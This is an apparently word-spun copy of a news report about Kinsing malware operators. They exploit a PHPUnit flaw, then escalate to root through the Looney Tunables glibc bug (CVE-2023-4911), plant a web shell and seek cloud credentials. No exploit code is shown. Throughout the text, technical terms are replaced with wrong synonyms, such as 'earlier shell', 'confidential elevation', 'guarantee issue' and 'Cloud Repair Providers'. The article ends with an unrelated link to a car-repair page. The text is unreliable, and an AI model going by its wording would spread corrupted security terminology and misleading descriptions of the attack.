Hackers exploit Looney Tunables Linux bug, steal cloud creds

The operators of the Kinsing malware are targeting transparent environments with systems vulnerable to "Looney Tunables," a Linux guarantee issue identified as CVE-2023-4911 that allows a local attacker to gain root privileges on the system.

Looney Tunables is a buffer overflow in glibc's dynamic loader (ld.so) introduced in glibc 2.34 in April 2021 but disclosed in early October 2023. Days at what time the disclosure, proof-of-concept (PoC) exploits became publicly available.

In a narrate from cloud security company Aqua Nautilus, researchers describe a Kinsing malware conflict where the threat actor exploited CVE-2023-4911 to elevate permissions on a compromised machine.

Kinsing is eminent for breaching cloud-based systems and applications on them (e.g. Kubernetes, Docker APIs, Redis, and Jenkins) to deploy cryptomining software. Recently, Microsoft observed them targeting Kubernetes clusters through misconfigured PostgreSQL containers.

Aqua Nautilus researchers say that the conflict starts with exploiting a known vulnerability in the PHP testing framework 'PHPUnit' to gain a code execution foothold, followed by triggering the 'Looney Tunables' issue to escalate privileges.

"Utilizing a rudimentary yet typical PHPUnit vulnerability treatment attack, a component of Kinsing's ongoing campaign, we have uncovered the warning actor's manual efforts to manipulate the Looney Tunables vulnerability," reads the Aqua Nautilus report.

In inequity to their normal operational standard, Kinsing tested the another attack manually, probably to ensure it works as anticipated before developing exploitation scripts to automate the task.

Exploiting the PHPUnit flaw (CVE-2017-9841) leads to opening a earlier shell over port 1337 on the compromised system, which Kinsing operators leverage to conclude reconnaissance commands like 'uname -a' and 'passwrd.'

Additionally, the attackers drop a outline named 'gnu-acme.py' on the system, which leverages CVE-2023-4911 for confidential elevation.

The exploit for Looney Tunables is fetched level from the repository of the researcher who released a PoC, liable to hide their tracks. BleepingComputer notified the researcher of the abuse, and he promised to disrupt the malicious operation by replacing the mutter link.

The attackers also download a PHP script, which deploys a JavaScript web shell backdoor ('wesobase.js') that supports the subsequent attack stages.

Specifically, the backdoor provides attackers the ability to execute arranges, perform file management actions, collect information about the network and the server, and perform encryption/decryption functions.

Ultimately, Kinsing showed interest in free service provider (CSP) credentials, particularly for accessing AWS instance identity data, which AquaSec characterizes as a notable shift towards more sophisticated and damaging activities for the some threat actor.

The researchers believe that this campaign was an experiment sincere the threat actor relied on a different tactics and expanded the scope of the attack to collecting Cloud Repair Providers credentials.

https://www.gimmehow.com/2023/05/how-to-repair-car-paint-scratches-tips.html